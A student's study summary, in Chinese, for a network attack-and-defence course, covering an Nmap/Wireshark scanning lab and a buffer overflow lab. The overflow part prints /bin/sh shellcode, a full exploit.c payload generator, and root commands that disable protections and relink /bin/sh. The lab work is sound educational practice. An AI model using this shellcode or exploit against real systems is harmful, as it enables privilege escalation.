2017-2018-2 20179317 卿爽 《网络攻防技术》第十周学习总结

##实验一：Nmap+Wireshark 攻击方与防守方均使用Kali虚拟机，本人IP：192.168.2.160，结对方：192.168.2.239，攻击方通过Nmap工具探测防守方，防守方用tcpdump工具与Wireshark工具通过抓包分析对方攻击目的和Nmap命令。

使用nmap进行探测：  使用tcpdump抓包：  针对抓到的数据包利用Wireshark进行分析：  此图显示抓取到了大量tcp包，说明攻击方正在进行tcp端口扫描。

##实验二：缓冲区溢出漏洞 ###一、实验简介 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制，甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭，溢出会引起返回地址被重写。

###二、环境配置 需要在32位环境下作操作，因此实验之前需要做一些准备。

sudo apt-get update

sudo apt-get install lib32z1 libc6-dev-i386

sudo apt-get install lib32readline-gplv2-dev    

###实验步骤： 1.关闭使用地址空间随机化来随机堆和栈的初始地址的功能 

2.由于许多shell程序在被调用时会自动放弃他们的特权，因而需要使用另一个shell（zsh）来代替/bin/bash:

sudo su

cd /bin

rm sh

ln -s zsh sh

exit

3.一般情况下，缓冲区溢出会造成程序崩溃，在程序中，溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址，那么程序就会跳转到该地址，如果该地址存放的是一段精心设计的代码用于实现其他功能，这段代码就是shellcode。

#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
execve(name[0], name, NULL);
}

本次实验的shellcode，就是刚才代码的汇编版本：

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

4.以下代码保存为“stack.c”文件，保存到 /tmp 目录下。 

5.编译该程序，并设置SET-UID。命令如下：  GCC编译器有一种栈保护机制来阻止缓冲区溢出，所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。而 -z execstack 用于允许执行栈。

6.把以下代码保存为“exploit.c”文件，保存到 /tmp 目录下。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=

"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

“\x??\x??\x??\x??”处需要添上shellcode保存在内存中的地址，因为发生溢出后这个位置刚好可以覆盖返回地址。

7.得到shellcode在内存中的地址，输入命令：

gdb stack

disass main

8.在0x080484f8处设定断点，并运行：

根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xffffd020 + 100 = 0xffffd084

9.现在修改exploit.c文件！将 \x??\x??\x??\x?? 修改为 \x84\xd0\xff\xff.然后，编译运行exploit.c程序

10.先运行攻击程序exploit，再运行漏洞程序stack

##实验问题 缓冲区溢出漏洞实验中，由于电脑卡住，未能进行后期的攻击环节。

##实验体会 通过这次学习，我对缓冲区溢出漏洞有了一定的理解，虽然没有完成整个的实验步骤，通过反复查看资料同样使我受益匪浅。